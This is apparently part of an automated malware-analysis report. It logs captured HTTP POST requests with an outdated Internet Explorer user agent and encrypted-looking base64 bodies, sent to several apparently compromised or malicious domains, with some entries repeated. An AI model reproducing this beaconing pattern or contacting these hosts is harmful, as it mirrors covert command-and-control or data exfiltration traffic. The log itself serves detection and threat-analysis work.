                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 44 59 39 66 34 52 32 39 76 64 44 4b 35 46 76 68 56 42 74 41 35 31 5a 76 34 44 33 4c 51 75 52 35 6f 54 2f 4c 67 38 4f 46 54 63 35 75 72 6a 4e 70 31 54 34 35 38 73 6a 65 7a 57 78 6b 69 41 66 6e 35 39 53 71 50 33 31 72 32 2b 67 39 59 51 46 52 70 45 5a 4e 55 76 41 6c 4e 6f 6b 52 35 6d 59 71 75 39 36 68 46 31 4d 34 6d 2b 50 66 61 5a 4f 66 4f 35 32 68 72 55 4c 45 78 6c 72 50 37 74 78 66 36 63 54 43 63 4a 48 57 42 36 6b 7a 79 6c 70 46 4e 75 41 6c 59 34 58 73 44 72 57 30 79 43 4d 56 35 62 4c 6e 74 6a 2b 57 33 53 50 4f 74 63 57 6b 52 32 4b 76 68 42 63 6c 46 36 50 6b 6e 6f 78 47 6c 79 39 6c 52 37 74 66 49 5a 4a 45 78 61 48 4e 43 43 49 79 57 30 53 6e 45 63 7a 31 54 6c 59 70 79 6e 72 6c 77 4f 6c 5a 49 35 70 4a 41 69 72 52 4e 4e 43 6e 45 4f 59 44 48 55 38 49 34 49 35 4d 34 57 6c 77 6f 57 33 4a 66 57 4d 54 53 4b 35 78 30 42 34 59 35 56 4f 41 48 78 52 76 63 5a 77 4d 79 70 44 41 49 36 70 30 63 39 78 33 5a 4d 6c 70 49 42 46 53 76 68 33 4b 50 2b 4d 52 4e 45 6d 57 50 6b 62 6a 57 50 73 77 63 71 6f 39 75 45 55 41 7a 32 62 6d 52 32 62 37 38 64 50 6a 61 36 63 5a 68 4e 57 65 44 51 58 36 45 42 36 66 56 50 5a 56 74 61 65 5a 75 69 32 36 4e 59 63 56 45 59 73 55 5a 33 5a 6d 64 78 4f 44 77 52 6d 57 71 64 55 2b 31 7a 36 4d 79 6e 6b 73 53 59 30 34 58 36 6a 5a 6b 46 79 52 61 4c 7a 70 54 4a 79 6c 54 6e 48 73 6a 78 2f 52 68 6a 2b 64 6f 39 59 63 66 46 38 57 39 5a 6c 6b 6a 4f 61 59 47 74 7a 6a 53 4b 36 71 53 30 67 78 36 33 72 5a 6f 76 41 51 77 78 48 4b 46 58 50 64 78 77 39 4d 57 41 66 76 36 47 52 62 55 53 6a 65 2b 53 2b 2f 73 39 30 52 50 4e 46 74 72 72 75 37 39 75 52 49 78 64 76 46 69 72 6f 45 53 49 56 35 2f 78 38 73 42 6c 59 3d Data Ascii: DY9f4R29vdDK5FvhVBtA51Zv4D3LQuR5oT/Lg8OFTc5urjNp1T458sjezWxkiAfn59SqP31r2+g9YQFRpEZNUvAlNokR5mYqu96hF1M4m+PfaZOfO52hrULExlrP7txf6cTCcJHWB6kzylpFNuAlY4XsDrW0yCMV5bLntj+W3SPOtcWkR2KvhBclF6PknoxGly9lR7tfIZJExaHNCCIyW0SnEcz1TlYpynrlwOlZI5pJAirRNNCnEOYDHU8I4I5M4WlwoW3JfWMTSK5x0B4Y5VOAHxRvcZwMypDAI6p0c9x3ZMlpIBFSvh3KP+MRNEmWPkbjWPswcqo9uEUAz2bmR2b78dPja6cZhNWeDQX6EB6fVPZVtaeZui26NYcVEYsUZ3ZmdxODwRmWqdU+1z6MynksSY04X6jZkFyRaLzpTJylTnHsjx/Rhj+do9YcfF8W9ZlkjOaYGtzjSK6qS0gx63rZovAQwxHKFXPdxw9MWAfv6GRbUSje+S+/s90RPNFtrru79uRIxdvFiroESIV5/x8sBlY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 44 59 39 66 34 52 32 39 76 64 44 4b 35 46 76 68 56 42 74 41 35 31 5a 76 34 44 33 4c 51 75 52 35 6f 54 2f 4c 67 38 4f 46 54 63 35 75 72 6a 4e 70 31 54 34 35 38 73 6a 65 7a 57 78 6b 69 41 66 6e 35 39 53 71 50 33 31 72 32 2b 67 39 59 51 46 52 70 45 5a 4e 55 76 41 6c 4e 6f 6b 52 35 6d 59 71 75 39 36 68 46 31 4d 34 6d 2b 50 66 61 5a 4f 66 4f 35 32 68 72 55 4c 45 78 6c 72 50 37 74 78 66 36 63 54 43 63 4a 48 57 42 36 6b 7a 79 6c 70 46 4e 75 41 6c 59 34 58 73 44 72 57 30 79 43 4d 56 35 62 4c 6e 74 6a 2b 57 33 53 50 4f 74 63 57 6b 52 32 4b 76 68 42 63 6c 46 36 50 6b 6e 6f 78 47 6c 79 39 6c 52 37 74 66 49 5a 4a 45 78 61 48 4e 43 43 49 79 57 30 53 6e 45 63 7a 31 54 6c 59 70 79 6e 72 6c 77 4f 6c 5a 49 35 70 4a 41 69 72 52 4e 4e 43 6e 45 4f 59 44 48 55 38 49 34 49 35 4d 34 57 6c 77 6f 57 33 4a 66 57 4d 54 53 4b 35 78 30 42 34 59 35 56 4f 41 48 78 52 76 63 5a 77 4d 79 70 44 41 49 36 70 30 63 39 78 33 5a 4d 6c 70 49 42 46 53 76 68 33 4b 50 2b 4d 52 4e 45 6d 57 50 6b 62 6a 57 50 73 77 63 71 6f 39 75 45 55 41 7a 32 62 6d 52 32 62 37 38 64 50 6a 61 36 63 5a 68 4e 57 65 44 51 58 36 45 42 36 66 56 50 5a 56 74 61 65 5a 75 69 32 36 4e 59 63 56 45 59 73 55 5a 33 5a 6d 64 78 4f 44 77 52 6d 57 71 64 55 2b 31 7a 36 4d 79 6e 6b 73 53 59 30 34 58 36 6a 5a 6b 46 79 52 61 4c 7a 70 54 4a 79 6c 54 6e 48 73 6a 78 2f 52 68 6a 2b 64 6f 39 59 63 66 46 38 57 39 5a 6c 6b 6a 4f 61 59 47 74 7a 6a 53 4b 36 71 53 30 67 78 36 33 72 5a 6f 76 41 51 77 78 48 4b 46 58 50 64 78 77 39 4d 57 41 66 76 36 47 52 62 55 53 6a 65 2b 53 2b 2f 73 39 30 52 50 4e 46 74 72 72 75 37 39 75 52 49 78 64 76 46 69 72 6f 45 53 49 56 35 2f 78 38 73 42 6c 59 3d Data Ascii: DY9f4R29vdDK5FvhVBtA51Zv4D3LQuR5oT/Lg8OFTc5urjNp1T458sjezWxkiAfn59SqP31r2+g9YQFRpEZNUvAlNokR5mYqu96hF1M4m+PfaZOfO52hrULExlrP7txf6cTCcJHWB6kzylpFNuAlY4XsDrW0yCMV5bLntj+W3SPOtcWkR2KvhBclF6PknoxGly9lR7tfIZJExaHNCCIyW0SnEcz1TlYpynrlwOlZI5pJAirRNNCnEOYDHU8I4I5M4WlwoW3JfWMTSK5x0B4Y5VOAHxRvcZwMypDAI6p0c9x3ZMlpIBFSvh3KP+MRNEmWPkbjWPswcqo9uEUAz2bmR2b78dPja6cZhNWeDQX6EB6fVPZVtaeZui26NYcVEYsUZ3ZmdxODwRmWqdU+1z6MynksSY04X6jZkFyRaLzpTJylTnHsjx/Rhj+do9YcfF8W9ZlkjOaYGtzjSK6qS0gx63rZovAQwxHKFXPdxw9MWAfv6GRbUSje+S+/s90RPNFtrru79uRIxdvFiroESIV5/x8sBlY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 44 59 39 66 34 52 32 39 76 64 44 4b 35 46 76 68 56 42 74 41 35 31 5a 76 34 44 33 4c 51 75 52 35 6f 54 2f 4c 67 38 4f 46 54 63 35 75 72 6a 4e 70 31 54 34 35 38 73 6a 65 7a 57 78 6b 69 41 66 6e 35 39 53 71 50 33 31 72 32 2b 67 39 59 51 46 52 70 45 5a 4e 55 76 41 6c 4e 6f 6b 52 35 6d 59 71 75 39 36 68 46 31 4d 34 6d 2b 50 66 61 5a 4f 66 4f 35 32 68 72 55 4c 45 78 6c 72 50 37 74 78 66 36 63 54 43 63 4a 48 57 42 36 6b 7a 79 6c 70 46 4e 75 41 6c 59 34 58 73 44 72 57 30 79 43 4d 56 35 62 4c 6e 74 6a 2b 57 33 53 50 4f 74 63 57 6b 52 32 4b 76 68 42 63 6c 46 36 50 6b 6e 6f 78 47 6c 79 39 6c 52 37 74 66 49 5a 4a 45 78 61 48 4e 43 43 49 79 57 30 53 6e 45 63 7a 31 54 6c 59 70 79 6e 72 6c 77 4f 6c 5a 49 35 70 4a 41 69 72 52 4e 4e 43 6e 45 4f 59 44 48 55 38 49 34 49 35 4d 34 57 6c 77 6f 57 33 4a 66 57 4d 54 53 4b 35 78 30 42 34 59 35 56 4f 41 48 78 52 76 63 5a 77 4d 79 70 44 41 49 36 70 30 63 39 78 33 5a 4d 6c 70 49 42 46 53 76 68 33 4b 50 2b 4d 52 4e 45 6d 57 50 6b 62 6a 57 50 73 77 63 71 6f 39 75 45 55 41 7a 32 62 6d 52 32 62 37 38 64 50 6a 61 36 63 5a 68 4e 57 65 44 51 58 36 45 42 36 66 56 50 5a 56 74 61 65 5a 75 69 32 36 4e 59 63 56 45 59 73 55 5a 33 5a 6d 64 78 4f 44 77 52 6d 57 71 64 55 2b 31 7a 36 4d 79 6e 6b 73 53 59 30 34 58 36 6a 5a 6b 46 79 52 61 4c 7a 70 54 4a 79 6c 54 6e 48 73 6a 78 2f 52 68 6a 2b 64 6f 39 59 63 66 46 38 57 39 5a 6c 6b 6a 4f 61 59 47 74 7a 6a 53 4b 36 71 53 30 67 78 36 33 72 5a 6f 76 41 51 77 78 48 4b 46 58 50 64 78 77 39 4d 57 41 66 76 36 47 52 62 55 53 6a 65 2b 53 2b 2f 73 39 30 52 50 4e 46 74 72 72 75 37 39 75 52 49 78 64 76 46 69 72 6f 45 53 49 56 35 2f 78 38 73 42 6c 59 3d Data Ascii: DY9f4R29vdDK5FvhVBtA51Zv4D3LQuR5oT/Lg8OFTc5urjNp1T458sjezWxkiAfn59SqP31r2+g9YQFRpEZNUvAlNokR5mYqu96hF1M4m+PfaZOfO52hrULExlrP7txf6cTCcJHWB6kzylpFNuAlY4XsDrW0yCMV5bLntj+W3SPOtcWkR2KvhBclF6PknoxGly9lR7tfIZJExaHNCCIyW0SnEcz1TlYpynrlwOlZI5pJAirRNNCnEOYDHU8I4I5M4WlwoW3JfWMTSK5x0B4Y5VOAHxRvcZwMypDAI6p0c9x3ZMlpIBFSvh3KP+MRNEmWPkbjWPswcqo9uEUAz2bmR2b78dPja6cZhNWeDQX6EB6fVPZVtaeZui26NYcVEYsUZ3ZmdxODwRmWqdU+1z6MynksSY04X6jZkFyRaLzpTJylTnHsjx/Rhj+do9YcfF8W9ZlkjOaYGtzjSK6qS0gx63rZovAQwxHKFXPdxw9MWAfv6GRbUSje+S+/s90RPNFtrru79uRIxdvFiroESIV5/x8sBlY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1690487546.7645209Data Raw: 38 78 55 31 42 6b 33 76 76 74 44 6c 50 5a 66 50 78 4d 6a 2b 52 77 62 4e 4d 2f 65 37 4b 44 79 6d 30 66 78 79 41 5a 59 62 36 58 54 59 48 75 32 7a 79 53 6e 4d 51 7a 52 42 4b 6b 65 2f 6c 2b 49 48 49 67 79 71 44 5a 79 45 6c 61 36 48 51 50 63 49 6c 46 38 75 6f 39 4e 77 4e 56 46 72 63 35 79 74 39 5a 34 48 4d 48 48 64 65 44 46 68 42 79 45 65 48 68 76 56 41 30 30 67 65 76 42 65 79 50 4b 6f 5a 37 2f 47 65 71 47 30 38 62 31 52 44 42 61 62 55 77 67 41 45 32 46 57 4e 66 36 68 50 39 62 33 5a 72 46 72 51 4c 55 63 70 65 35 4d 73 32 5a 54 52 6c 69 63 54 50 53 56 33 53 4e 37 7a 58 2b 55 4d 6b 32 49 6b 52 6b 44 62 73 43 4b 4f 47 56 63 46 67 6b 6a 49 33 76 59 70 52 49 69 4f 38 47 6e 47 48 6a 35 43 39 50 38 74 77 73 65 6c 58 77 4e 78 57 79 6e 61 61 4a 58 34 43 36 66 36 45 6d 35 42 30 30 36 69 65 2f 4d 4a 4c 62 2f 65 4b 79 4a 47 56 74 61 7a 6c 44 52 34 34 75 69 53 4f 48 78 63 75 49 75 44 55 54 6f 52 67 79 63 46 42 78 33 69 61 72 4e 51 69 6b 4d 72 31 45 51 34 51 37 65 42 4f 72 36 31 70 49 58 6a 35 34 4b 45 6b 33 55 62 78 78 7a 4d 43 71 61 6a 4d 41 6a 72 52 37 2b 55 2f 68 59 76 4e 2b 52 52 77 6f 4a 6f 6b 57 43 76 41 45 68 43 6e 61 77 4f 54 37 2f 41 77 6d 6b 70 4b 68 55 51 64 79 6d 6b 37 66 61 58 53 76 69 6d 66 6a 68 34 41 68 79 51 46 49 2f 6a 4b 68 6b 44 47 54 6f 7a 74 71 45 4c 6e 45 59 4d 67 30 2f 4d 6f 6c 4c 72 4f 73 52 51 57 63 69 78 70 32 52 4a 38 32 48 7a 67 79 6f 4b 4d 36 68 4e 45 78 61 7a 68 4e 59 7a 33 69 36 48 76 6f 5a 53 44 73 39 57 35 6f 4c 7a 43 62 76 6d 79 79 44 6d 41 64 79 44 54 57 6e 44 7a 47 66 53 2f 52 4a 37 76 77 53 73 58 36 34 61 49 6a 69 47 36 42 37 76 4d 78 53 79 77 2f 53 49 70 47 46 79 4b 6f 70 71 69 66 62 62 42 54 39 38 79 65 66 43 4d 4f 4d 34 76 4e 56 77 2f 57 44 4d 36 73 3d Data Ascii: 8xU1Bk3vvtDlPZfPxMj+RwbNM/e7KDym0fxyAZYb6XTYHu2zySnMQzRBKke/l+IHIgyqDZyEla6HQPcIlF8uo9NwNVFrc5yt9Z4HMHHdeDFhByEeHhvVA00gevBeyPKoZ7/GeqG08b1RDBabUwgAE2FWNf6hP9b3ZrFrQLUcpe5Ms2ZTRlicTPSV3SN7zX+UMk2IkRkDbsCKOGVcFgkjI3vYpRIiO8GnGHj5C9P8twselXwNxWynaaJX4C6f6Em5B006ie/MJLb/eKyJGVtazlDR44uiSOHxcuIuDUToRgycFBx3iarNQikMr1EQ4Q7eBOr61pIXj54KEk3UbxxzMCqajMAjrR7+U/hYvN+RRwoJokWCvAEhCnawOT7/AwmkpKhUQdymk7faXSvimfjh4AhyQFI/jKhkDGToztqELnEYMg0/MolLrOsRQWcixp2RJ82HzgyoKM6hNExazhNYz3i6HvoZSDs9W5oLzCbvmyyDmAdyDTWnDzGfS/RJ7vwSsX64aIjiG6B7vMxSyw/SIpGFyKopqifbbBT98yefCMOM4vNVw/WDM6s=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fnsds.orgCache-Control: no-cacheData Raw: 6f 71 52 56 41 4d 4c 4e 70 64 43 51 4c 4d 31 70 74 62 4c 48 2f 45 57 30 4a 67 76 53 4a 4b 6b 47 46 6b 67 2b 69 49 5a 62 4a 45 47 6a 43 51 36 4b 45 65 2b 59 4d 41 68 77 67 70 46 66 39 74 67 37 6d 48 59 51 32 4f 74 75 39 78 6a 4d 6a 51 70 5a 57 77 32 44 38 46 79 71 7a 64 52 63 55 6d 55 4f 73 50 6f 31 37 6b 67 64 62 57 49 65 75 45 32 54 32 58 6d 53 33 50 35 70 45 42 36 46 6b 6a 51 4b 62 7a 63 76 50 6c 35 69 64 6a 62 62 63 62 79 53 30 37 57 55 41 78 31 55 6e 30 48 53 43 37 79 30 52 6c 7a 41 78 43 35 4e 52 70 55 31 6d 65 67 44 6f 7a 53 51 6e 76 78 59 49 59 42 2b 51 4d 67 54 51 64 50 44 62 79 59 72 75 5a 48 37 52 32 2f 57 65 63 62 67 71 35 58 45 70 67 41 5a 48 53 52 6d 2b 51 6e 41 66 6d 49 75 67 45 74 72 78 71 4b 4a 39 36 44 4d 47 48 75 39 7a 4d 54 67 68 37 67 70 4e 36 37 36 63 2f 42 4e 6f 61 69 78 77 64 68 30 4f 67 63 65 36 4f 4a 66 79 4e 38 4f 64 57 5a 6c 43 55 48 42 54 4f 57 70 74 36 68 4a 61 4b 62 74 79 6e 5a 66 4f 37 35 46 74 30 56 5a 64 31 47 4c 32 4b 65 37 35 2f 53 54 43 6d 6c 67 70 39 6c 78 6d 6f 4b 73 67 4f 42 78 77 75 39 6d 44 50 78 57 49 46 63 57 6e 6a 38 56 66 46 68 6c 42 31 61 36 37 6b 34 4e 58 58 79 41 57 6a 41 58 52 68 4b 36 6b 47 48 2f 71 6d 2b 2f 6a 56 4a 4a 73 34 59 51 6c 61 68 6e 63 6f 66 41 69 48 6e 65 4b 73 48 4b 50 78 63 73 47 4c 30 47 72 66 62 77 51 32 74 31 46 2b 58 66 44 33 4e 43 56 54 52 4a 66 4c 4f 6b 6a 53 39 6d 42 35 33 79 4a 4d 75 70 65 4e 41 78 4b 72 2f 2f 58 47 47 75 63 68 2b 4e 50 35 46 70 6d 44 68 2f 4b 6d 51 51 65 69 6b 56 4f 37 62 4d 32 73 44 6a 2b 38 67 6b 70 4e 47 57 41 4a 4a 41 43 70 56 33 53 67 44 4f 64 62 52 62 35 66 4d 59 45 4d 6d 69 46 47 6b 70 70 76 6c 73 49 6e 56 37 74 57 78 54 42 74 72 39 6e 6c 62 4b 6c 72 48 4a 75 6a 5a 61 45 2b 47 6e 7a 4e 39 47 52 2b 73 2b 56 6f 76 36 57 65 6e 2b Data Ascii: oqRVAMLNpdCQLM1ptbLH/EW0JgvSJKkGFkg+iIZbJEGjCQ6KEe+YMAhwgpFf9tg7mHYQ2Otu9xjMjQpZWw2D8FyqzdRcUmUOsPo17kgdbWIeuE2T2XmS3P5pEB6FkjQKbzcvPl5idjbbcbyS07WUAx1Un0HSC7y0RlzAxC5NRpU1megDozSQnvxYIYB+QMgTQdPDbyYruZH7R2/Wecbgq5XEpgAZHSRm+QnAfmIugEtrxqKJ96DMGHu9zMTgh7gpN676c/BNoaixwdh0Ogce6OJfyN8OdWZlCUHBTOWpt6hJaKbtynZfO75Ft0VZd1GL2Ke75/STCmlgp9lxmoKsgOBxwu9mDPxWIFcWnj8VfFhlB1a67k4NXXyAWjAXRhK6kGH/qm+/jVJJs4YQlahncofAiHneKsHKPxcsGL0GrfbwQ2t1F+XfD3NCVTRJfLOkjS9mB53yJMupeNAxKr//XGGuch+NP5FpmDh/KmQQeikVO7bM2sDj+8gkpNGWAJJACpV3SgDOdbRb5fMYEMmiFGkppvlsInV7tWxTBtr9nlbKlrHJujZaE+GnzN9GR+s+Vov6Wen+
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 38 34 75 6f 73 34 6e 68 7a 4e 42 65 7a 67 73 78 32 50 30 54 66 36 4a 4b 6c 6d 53 6e 2f 65 78 51 7a 52 52 49 4f 64 6c 43 4d 56 68 70 48 57 4a 50 6d 68 55 7a 77 47 5a 7a 5a 4b 69 34 4f 75 68 4d 48 69 46 56 6f 61 43 70 4e 4e 42 69 43 6f 6b 72 53 2f 61 42 54 5a 5a 36 73 43 77 74 48 73 34 7a 33 43 4a 6c 6a 52 53 4c 50 38 6d 70 32 34 58 79 52 38 41 35 50 44 36 65 33 74 58 6b 6b 45 31 6a 4d 58 74 39 45 49 47 46 4a 49 6f 56 33 45 49 65 35 64 33 44 7a 36 6d 67 7a 57 63 4c 44 54 69 41 37 62 2b 31 50 65 32 5a 44 51 4d 76 57 79 59 73 77 6c 67 6f 62 2f 70 45 74 44 34 41 50 6f 71 66 6d 62 48 68 42 36 32 58 73 54 6b 50 33 67 4c 6b 78 57 58 35 75 45 34 72 58 6c 6e 70 61 50 6c 56 42 50 68 35 47 41 2b 4f 52 73 45 4a 68 7a 53 72 61 35 4b 58 44 4e 35 68 31 62 57 6e 35 79 2f 33 30 4a 53 49 74 61 41 6c 43 54 31 71 37 51 48 6c 58 45 55 56 59 34 55 6e 32 52 75 57 61 30 4c 65 69 4c 57 4c 72 56 49 34 6b 6a 4b 74 5a 6b 6e 4d 41 79 5a 79 66 54 79 51 57 76 42 6e 6c 71 72 72 50 52 56 76 4a 6f 70 49 63 4c 63 72 77 44 4a 4f 78 73 72 37 34 2f 73 56 2b 2b 65 6d 64 50 5a 67 53 4b 2f 68 65 61 45 39 33 6a 4a 4e 41 62 4e 5a 64 70 62 6d 51 31 73 42 44 38 49 6d 79 79 6b 64 70 59 2b 4e 6c 7a 50 71 33 57 76 45 72 6a 6b 6e 72 35 4e 68 76 69 33 36 68 2b 54 46 48 6d 72 50 33 6e 47 36 63 50 56 68 57 6c 4f 34 6e 42 6a 67 61 61 6c 4b 62 6c 7a 6f 6e 76 7a 7a 32 6b 54 4d 51 75 57 43 62 63 58 70 71 69 4f 31 71 37 63 6a 4d 4c 58 4c 41 65 72 71 63 36 4f 6e 64 6f 41 6d 6d 75 30 73 5a 66 34 2b 66 58 75 56 43 54 4e 61 72 32 6b 70 72 34 37 4d 39 51 79 6f 57 51 52 43 59 62 4e 7a 66 68 71 62 59 54 47 44 67 70 35 39 61 47 52 71 68 55 6a 4c 38 48 66 73 74 4b 6c 71 55 78 33 57 4a 41 6f 36 61 4a 33 66 47 67 3d 3d Data Ascii: 84uos4nhzNBezgsx2P0Tf6JKlmSn/exQzRRIOdlCMVhpHWJPmhUzwGZzZKi4OuhMHiFVoaCpNNBiCokrS/aBTZZ6sCwtHs4z3CJljRSLP8mp24XyR8A5PD6e3tXkkE1jMXt9EIGFJIoV3EIe5d3Dz6mgzWcLDTiA7b+1Pe2ZDQMvWyYswlgob/pEtD4APoqfmbHhB62XsTkP3gLkxWX5uE4rXlnpaPlVBPh5GA+ORsEJhzSra5KXDN5h1bWn5y/30JSItaAlCT1q7QHlXEUVY4Un2RuWa0LeiLWLrVI4kjKtZknMAyZyfTyQWvBnlqrrPRVvJopIcLcrwDJOxsr74/sV++emdPZgSK/heaE93jJNAbNZdpbmQ1sBD8ImyykdpY+NlzPq3WvErjknr5Nhvi36h+TFHmrP3nG6cPVhWlO4nBjgaalKblzonvzz2kTMQuWCbcXpqiO1q7cjMLXLAerqc6OndoAmmu0sZf4+fXuVCTNar2kpr47M9QyoWQRCYbNzfhqbYTGDgp59aGRqhUjL8HfstKlqUx3WJAo6aJ3fGg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 7a 72 4b 58 34 6b 44 48 76 64 43 4d 78 54 79 44 45 35 47 31 36 48 4f 77 4d 35 34 6f 42 30 70 4c 64 45 71 42 6b 6d 36 6b 35 59 6c 47 49 72 59 68 72 2f 76 66 68 34 52 67 44 2f 56 71 78 55 47 52 62 68 45 44 48 50 6e 67 70 30 69 70 72 5a 76 58 49 71 2f 2f 45 39 5a 33 4c 63 64 70 2b 61 44 61 70 74 47 39 4a 67 38 4a 68 54 51 2b 6e 50 66 48 71 46 32 72 59 6c 32 4a 48 6f 63 4a 52 43 2f 4f 53 72 57 70 6b 79 45 77 76 7a 5a 4e 55 34 36 44 6d 6b 47 71 51 63 54 32 70 4f 68 77 4c 52 56 62 64 37 78 68 4f 2f 78 47 50 65 52 76 41 32 37 79 6f 69 76 52 75 5a 36 59 38 39 42 76 61 30 4f 75 41 53 51 78 6d 70 58 46 48 52 67 75 33 58 61 76 75 39 4d 4b 4d 54 76 4c 31 6d 33 59 54 64 6f 6b 41 63 71 73 48 6f 41 67 78 57 78 35 6f 76 79 73 74 37 4d 6b 61 64 43 49 78 70 67 51 35 76 47 56 74 37 76 45 61 58 32 72 48 4c 32 37 78 38 52 39 6d 42 77 71 6a 70 56 65 6a 38 7a 44 79 66 6b 56 79 31 35 4c 71 37 33 57 33 61 53 52 31 78 64 47 73 44 6d 78 4e 58 36 48 78 62 30 79 64 4c 52 7a 49 58 50 4f 48 67 69 70 46 35 76 6d 5a 43 68 48 6f 35 71 42 58 31 31 64 31 6f 71 65 44 44 45 6b 34 37 36 4b 56 49 68 7a 6a 6d 4e 34 4e 34 2f 6b 41 4d 59 46 41 58 36 35 79 50 50 4d 48 62 30 42 35 70 4f 47 71 41 51 7a 6d 72 4a 7a 2f 66 64 75 52 52 39 65 50 6f 34 6d 63 30 6f 43 68 6b 75 53 2f 4f 37 68 38 57 52 69 63 6f 33 34 7a 2b 64 36 79 4c 6c 34 71 44 69 31 59 4f 45 59 52 76 30 70 61 70 35 4b 36 2b 66 72 68 4c 78 4d 72 6f 36 6a 41 47 51 4e 50 6d 48 33 6a 65 43 70 53 6c 36 51 33 70 79 49 70 30 49 57 52 37 31 31 7a 64 6d 35 2f 73 70 65 50 50 45 6e 62 6c 4e 78 41 44 56 49 7a 73 45 39 61 68 45 62 4a 6d 2b 71 43 37 77 33 34 4e 4c 55 42 44 61 55 4c 6b 71 44 56 4e 38 3d Data Ascii: zrKX4kDHvdCMxTyDE5G16HOwM54oB0pLdEqBkm6k5YlGIrYhr/vfh4RgD/VqxUGRbhEDHPngp0iprZvXIq//E9Z3Lcdp+aDaptG9Jg8JhTQ+nPfHqF2rYl2JHocJRC/OSrWpkyEwvzZNU46DmkGqQcT2pOhwLRVbd7xhO/xGPeRvA27yoivRuZ6Y89Bva0OuASQxmpXFHRgu3Xavu9MKMTvL1m3YTdokAcqsHoAgxWx5ovyst7MkadCIxpgQ5vGVt7vEaX2rHL27x8R9mBwqjpVej8zDyfkVy15Lq73W3aSR1xdGsDmxNX6Hxb0ydLRzIXPOHgipF5vmZChHo5qBX11d1oqeDDEk476KVIhzjmN4N4/kAMYFAX65yPPMHb0B5pOGqAQzmrJz/fduRR9ePo4mc0oChkuS/O7h8WRico34z+d6yLl4qDi1YOEYRv0pap5K6+frhLxMro6jAGQNPmH3jeCpSl6Q3pyIp0IWR711zdm5/spePPEnblNxADVIzsE9ahEbJm+qC7w34NLUBDaULkqDVN8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheCookie: btst=8e12fd1539699ac6bdaab177f131d683|84.17.52.43|1690487582|1690487547|17|2|0; snkz=84.17.52.43Data Raw: 70 4e 33 30 4a 58 31 48 79 4e 41 32 6d 36 50 44 4e 47 4a 4c 6e 72 5a 45 6b 50 4f 72 48 4d 37 2b 41 54 67 41 31 4a 5a 39 2b 43 77 34 63 39 63 62 41 36 5a 33 79 65 71 38 42 37 32 5a 58 77 2b 74 74 35 6c 4c 4b 39 31 30 38 72 4c 47 74 52 52 67 59 6e 7a 71 2f 2f 58 52 37 52 54 64 33 4a 50 51 33 6f 47 66 65 50 75 56 2f 72 45 2b 70 65 33 4e 6d 6e 72 6c 35 6d 30 73 49 31 75 6e 43 51 42 6d 76 43 6b 39 4e 6c 58 62 75 67 4c 2b 36 46 52 32 4d 58 39 4b 44 4a 37 52 59 2b 71 45 58 71 52 6b 6d 63 57 65 55 45 63 50 35 31 44 72 31 4a 7a 57 41 71 55 4f 58 58 41 58 46 4e 2b 4f 52 4e 63 7a 5a 4f 31 54 74 34 72 71 35 37 64 2f 2f 72 7a 4f 34 35 71 2f 54 56 50 7a 49 39 67 71 4c 66 52 54 62 4a 58 2b 72 4e 48 6f 56 4b 42 50 74 47 41 6a 6f 6c 2b 5a 44 76 2b 45 46 67 53 2b 73 32 50 37 70 33 77 38 61 7a 61 73 69 75 35 5a 32 37 72 70 68 33 70 30 2f 73 4a 67 69 68 65 77 71 2b 6e 54 6a 47 69 46 76 75 54 52 50 77 78 6d 56 79 6f 71 68 49 74 76 6a 56 4e 6f 6a 63 6c 2b 4c 64 35 51 35 58 4f 66 54 59 4a 6f 42 78 48 47 47 79 63 43 41 58 4c 50 42 2f 77 58 67 31 33 61 52 72 4d 6c 5a 33 38 36 77 65 2b 4e 6a 48 62 37 51 6e 66 58 46 4f 7a 5a 70 76 62 54 55 57 59 39 55 4d 4f 6a 6a 33 4a 39 37 44 41 74 34 79 72 63 72 51 31 62 7a 61 5a 47 4e 6b 75 50 63 41 36 4e 73 4b 4d 52 72 62 4c 66 49 63 53 66 30 6d 78 62 72 58 30 74 45 36 6d 66 67 71 69 55 35 37 6a 7a 45 54 35 6d 57 53 5a 30 70 4f 71 35 61 4f 36 58 30 46 4f 70 5a 39 33 70 77 49 64 35 6e 4e 47 6f 62 37 42 4e 46 39 4d 44 6d 65 32 6f 50 77 6d 78 6f 36 71 4c 4a 76 2b 6f 4a 59 4a 70 30 73 5a 52 69 66 6c 30 37 38 55 4c 39 6c 39 75 4d 6f 6d 43 4f 68 4b 6d 61 34 6c 4b 39 77 3d 3d Data Ascii: 